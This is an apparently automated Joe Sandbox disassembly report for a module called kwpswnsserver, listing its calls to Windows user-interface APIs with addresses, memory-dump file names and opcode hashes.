                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952889
                                                                  • FillRect.USER32(?,?,?), ref: 6C9528C0
                                                                  • InflateRect.USER32(?,00000000,000000FF), ref: 6C9528FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Fill$EmptyInflateParent
                                                                  • String ID:
                                                                  • API String ID: 2418387936-0
                                                                  • Opcode ID: 4d90af957cac1bd12c71e0f8fddfd974201ff92b0b0aaf4f1e4d1378a340e738
                                                                  • Instruction ID: 303e4e8ff1e011ea4ca8317960beec09fa8e71395dacaf0863a939b06d019963
                                                                  • Opcode Fuzzy Hash: 4d90af957cac1bd12c71e0f8fddfd974201ff92b0b0aaf4f1e4d1378a340e738
                                                                  • Instruction Fuzzy Hash: E071D372A00A0A9FCF05DFA8CD589EF77B9FF45308F514529FA11AB640DB35E8118BA0
                                                                  APIs
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954576
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C954584
                                                                  • InflateRect.USER32(?,?,000000FF), ref: 6C9545FF
                                                                  • InflateRect.USER32(?,00000000,000000FF), ref: 6C954694
                                                                  • FillRect.USER32(550018C2,?,00000000), ref: 6C9546B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Inflate$Fill
                                                                  • String ID:
                                                                  • API String ID: 309753019-0
                                                                  • Opcode ID: fac0fe71ed9a0c77a535a506d33047b19e599bcdd7ccfe23c059c6616eea45ee
                                                                  • Instruction ID: 106cac2fb795319b170fec49de56a0e2c269f6039427663dfb1d6c1d77d9ce1d
                                                                  • Opcode Fuzzy Hash: fac0fe71ed9a0c77a535a506d33047b19e599bcdd7ccfe23c059c6616eea45ee
                                                                  • Instruction Fuzzy Hash: 5D517075A0161ADFCF04DFA8C8849AE77B9BF49314B418269E816EB390DB30E915CF90
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BDCEF
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                  • PtInRect.USER32(?,00000000,?), ref: 6C8BDD09
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BDD82
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRect$Screen
                                                                  • String ID:
                                                                  • API String ID: 3187875807-0
                                                                  • Opcode ID: 49efb3f22ff19e212cbf65ac7e9c5da405b40d8725bc0b27fb65fbc457841f10
                                                                  • Instruction ID: cb20cb11b07381676156915b949aebdec30d8cc415bb4dfff0899762e828bf00
                                                                  • Opcode Fuzzy Hash: 49efb3f22ff19e212cbf65ac7e9c5da405b40d8725bc0b27fb65fbc457841f10
                                                                  • Instruction Fuzzy Hash: 7B414272A0060AEFCF20CFA8CA849DE7BB5FF06349F144966E945FB614D731AA45CB50
                                                                  APIs
                                                                  • GetCursorPos.USER32(00000000), ref: 6C886D1C
                                                                  • GetKeyState.USER32(00000011), ref: 6C886D24
                                                                  • ScreenToClient.USER32(?,00000000), ref: 6C886DBC
                                                                  • ClientToScreen.USER32(?,00000000), ref: 6C886E09
                                                                  • SetCursorPos.USER32(00000000,00000000), ref: 6C886E15
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorScreen$State
                                                                  • String ID:
                                                                  • API String ID: 3982492586-0
                                                                  • Opcode ID: 5815d29cbc9c8f38b217c377220092dbc0c397baec71f56e7a4a8ed4b7f6baa3
                                                                  • Instruction ID: 1b1d540f7c446ec4d3b8f4f2190df40673696fd2d1d2034c83b4f6efa1fc53ec
                                                                  • Opcode Fuzzy Hash: 5815d29cbc9c8f38b217c377220092dbc0c397baec71f56e7a4a8ed4b7f6baa3
                                                                  • Instruction Fuzzy Hash: 8C310972A12519EFCB29CFB8CA55BADBBB1FF46316F204A29E412D7D90D7319A408740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorScreen$Rect
                                                                  • String ID:
                                                                  • API String ID: 1082406499-0
                                                                  • Opcode ID: 47b8a2cdc92e8d8bd0ab56167813a60c60d5ed9267b41ced2e65484b9693dfef
                                                                  • Instruction ID: fdc432779b72c542dd4b03823cff564cd5fcd232c4c679a35e18d3ec652298d9
                                                                  • Opcode Fuzzy Hash: 47b8a2cdc92e8d8bd0ab56167813a60c60d5ed9267b41ced2e65484b9693dfef
                                                                  • Instruction Fuzzy Hash: 8D31BE71B0121BDFCF59DFA4CA94AAEB7B5BF49308F11462AE415A3700DB30A956CB90
                                                                  APIs
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(?), ref: 6C8820A4
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(00000000), ref: 6C8820AB
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 6C88268F
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 6C8826E3
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 6C8826F2
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 6C882708
                                                                  • GetClientRect.USER32(?,?), ref: 6C88271C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParent$ClientRectRedraw
                                                                  • String ID:
                                                                  • API String ID: 556606033-0
                                                                  • Opcode ID: b00bdd5007924286e57e771be3f6d7951823966b77a562325c9514ddaf9b7976
                                                                  • Instruction ID: 15f56ef1943773550cc9b75a53fe87fdf92de5f6fbbf8eb1bd29049413410528
                                                                  • Opcode Fuzzy Hash: b00bdd5007924286e57e771be3f6d7951823966b77a562325c9514ddaf9b7976
                                                                  • Instruction Fuzzy Hash: 77213131702215BFEF366A75CD886AE76B9FF05398F100635E812D2991DF64DC118790
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(?), ref: 6C8820A4
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(00000000), ref: 6C8820AB
                                                                  • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 6C8823A1
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C8823CA
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C8823E9
                                                                  • SendMessageW.USER32(?,00000222,?,00000000), ref: 6C882403
                                                                  • SendMessageW.USER32(?,00000222,00000000,?), ref: 6C88242C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Parent$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 4191550487-0
                                                                  • Opcode ID: 061a2dd2d33e8c94d7b0863ca24fce8e0ba41bea4234a5bdc8450dfd07d35c8c
                                                                  • Instruction ID: aa3f1cb0980cefd1be2ef68e27260073ba0724941fa035a40744721273d69a56
                                                                  • Opcode Fuzzy Hash: 061a2dd2d33e8c94d7b0863ca24fce8e0ba41bea4234a5bdc8450dfd07d35c8c
                                                                  • Instruction Fuzzy Hash: A8212871201605BFDB359B65CD5CFAEB6B9FB0838CF040E25F15286D90CB78AD108660
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BCD62
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCD8E
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCDA6
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCDCF
                                                                  • SendMessageW.USER32(?,00000200,?,?), ref: 6C8BCDEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientCursorMessagePointsSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1257894355-0
                                                                  • Opcode ID: 9e032a57b70137b7d7310aeeccab197fbebb088718fd23a354df30d35030764f
                                                                  • Instruction ID: 049b36c227fcc886e36b7495705ff1b2bcaf18d8608bd5cc7bead0fc890a243f
                                                                  • Opcode Fuzzy Hash: 9e032a57b70137b7d7310aeeccab197fbebb088718fd23a354df30d35030764f
                                                                  • Instruction Fuzzy Hash: E231C775A0031AEFCF249F68CD549BEBF75FF05354F10862AF825A2650D730A911CB90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BE67C
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 6C8BE6D8
                                                                  • UnionRect.USER32(?,?,?), ref: 6C8BE6F1
                                                                  • EqualRect.USER32(?,?), ref: 6C8BE6FF
                                                                  • UpdateWindow.USER32(?), ref: 6C8BE736
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$EqualLongOffsetUnionUpdate
                                                                  • String ID:
                                                                  • API String ID: 4261707372-0
                                                                  • Opcode ID: 25df1272ba218c58e918d270db4bd5449d8f9c752261f66860ed25c94371889a
                                                                  • Instruction ID: d7316095decfbb091191fea3cfc405effcd0e75da85461a3cdc38bdbb72a3d0b
                                                                  • Opcode Fuzzy Hash: 25df1272ba218c58e918d270db4bd5449d8f9c752261f66860ed25c94371889a
                                                                  • Instruction Fuzzy Hash: EA317071A0160AAFCB14DF68CE44ADEF7B9BF5A308F108766E415E3250DB30A951CB90
                                                                  APIs
                                                                    • Part of subcall function 6C8B670C: __EH_prolog3_GS.LIBCMT ref: 6C8B6713
                                                                    • Part of subcall function 6C8B670C: GetWindowRect.USER32(00000000,00000000), ref: 6C8B675C
                                                                    • Part of subcall function 6C8B670C: CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C8B6786
                                                                    • Part of subcall function 6C8B670C: SetWindowRgn.USER32(00000000,?,00000000), ref: 6C8B679C
                                                                  • GetSystemMenu.USER32(?,00000000), ref: 6C8B8D56
                                                                  • DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 6C8B8D73
                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 6C8B8D82
                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 6C8B8D91
                                                                  • EnableMenuItem.USER32(?,0000F060,00000001), ref: 6C8B8DB9
                                                                    • Part of subcall function 6C8B74F0: SetRectEmpty.USER32(?), ref: 6C8B751B
                                                                    • Part of subcall function 6C8B74F0: ReleaseCapture.USER32 ref: 6C8B7521
                                                                    • Part of subcall function 6C8B74F0: SetCapture.USER32(?,?,?,?,6C8AF492,?), ref: 6C8B7534
                                                                    • Part of subcall function 6C8B74F0: RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C8B7634
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteRectWindow$Capture$CreateEmptyEnableH_prolog3_ItemRedrawReleaseRoundSystem
                                                                  • String ID:
                                                                  • API String ID: 4022425685-0
                                                                  • Opcode ID: 383a4bfe0c4b22afaf8dc645d6a13bcfe0731e232a452e65c91e447c47d0bc67
                                                                  • Instruction ID: cc7e41cc73bcdd94b558b05d361f81f20def9f45506bd31c1b130ec27cd72c39
                                                                  • Opcode Fuzzy Hash: 383a4bfe0c4b22afaf8dc645d6a13bcfe0731e232a452e65c91e447c47d0bc67
                                                                  • Instruction Fuzzy Hash: A421A131301317AFDF252B658D98EAE7F3AFF55249B088136F909A7750CB319811DAA0
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C888EA5
                                                                  • SendMessageW.USER32(?,00000455,00000000,00000000), ref: 6C888EB9
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888ECC
                                                                  • SetWindowLongW.USER32(?,000000F0,?), ref: 6C888F03
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888F18
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Long
                                                                  • String ID:
                                                                  • API String ID: 3430364388-0
                                                                  • Opcode ID: f93010f320c55f7de6f6fd9c9b60cd9020aafa07b3d28c5485fb909a41d6b9a5
                                                                  • Instruction ID: cf849118c4c1a858821feef4634768e0395a45ab4ad81d6263378faeed60405e
                                                                  • Opcode Fuzzy Hash: f93010f320c55f7de6f6fd9c9b60cd9020aafa07b3d28c5485fb909a41d6b9a5
                                                                  • Instruction Fuzzy Hash: 3F21F271202715AFDB259F68CD84E6BBAB9FB84758F10863EB10997E90DB709C04CB60
                                                                  APIs
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
                                                                    • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
                                                                    • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
                                                                  • SetCursor.USER32(00000009), ref: 6C8862B8
                                                                  • LoadCursorW.USER32(?,00007905), ref: 6C8862FD
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 6C886313
                                                                  • SetCursor.USER32(?,?,00000009), ref: 6C88632C
                                                                  • DestroyCursor.USER32(00000000), ref: 6C886337
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$CriticalSection$EnterLoad$DestroyInitializeLeave
                                                                  • String ID:
                                                                  • API String ID: 900973665-0
                                                                  • Opcode ID: 537487f2839e10d8d59cdc17930cc746d49b16b8d76ecefafa9c9d21d8b07260
                                                                  • Instruction ID: dd1bc6119a0daeca5b33d3252d3af4160d4809520eb6d10f4e919d59054e60a7
                                                                  • Opcode Fuzzy Hash: 537487f2839e10d8d59cdc17930cc746d49b16b8d76ecefafa9c9d21d8b07260
                                                                  • Instruction Fuzzy Hash: 8811D231F2A3169BDB705BA8DA84B8E3774E743318F608D7AE508C7F50DB28D8468751
                                                                  APIs
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8CE0F7
                                                                  • GetParent.USER32(?), ref: 6C8CE109
                                                                  • GetClientRect.USER32(?,?), ref: 6C8CE11C
                                                                  • GetParent.USER32(?), ref: 6C8CE125
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8CE13D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ParentRect$ClientFillPointsWindow
                                                                  • String ID:
                                                                  • API String ID: 3058756167-0
                                                                  • Opcode ID: 754657aef219d0bfd361788a3435f5a27f5559a29aff78f096d877bcb1d4ec30
                                                                  • Instruction ID: a19c2cae7cb91a7731f862ab30b85a2fc6c7535eba10332874a9d6edd07dc90e
                                                                  • Opcode Fuzzy Hash: 754657aef219d0bfd361788a3435f5a27f5559a29aff78f096d877bcb1d4ec30
                                                                  • Instruction Fuzzy Hash: A021A432A00219EFCB04EFA4CD498AEBB79FF0A304B518165F505A7651DB31A915CBD1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C93BC13
                                                                  • SendMessageW.USER32(00000000,0000007F,00000000,00000000), ref: 6C93BC36
                                                                  • SendMessageW.USER32(00000000,0000007F,00000001,00000000), ref: 6C93BC4A
                                                                  • GetClassLongW.USER32(00000000,000000DE), ref: 6C93BCA7
                                                                  • GetClassLongW.USER32(00000000,000000F2), ref: 6C93BCB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLongMessageSend$H_prolog3
                                                                  • String ID:
                                                                  • API String ID: 350087385-0
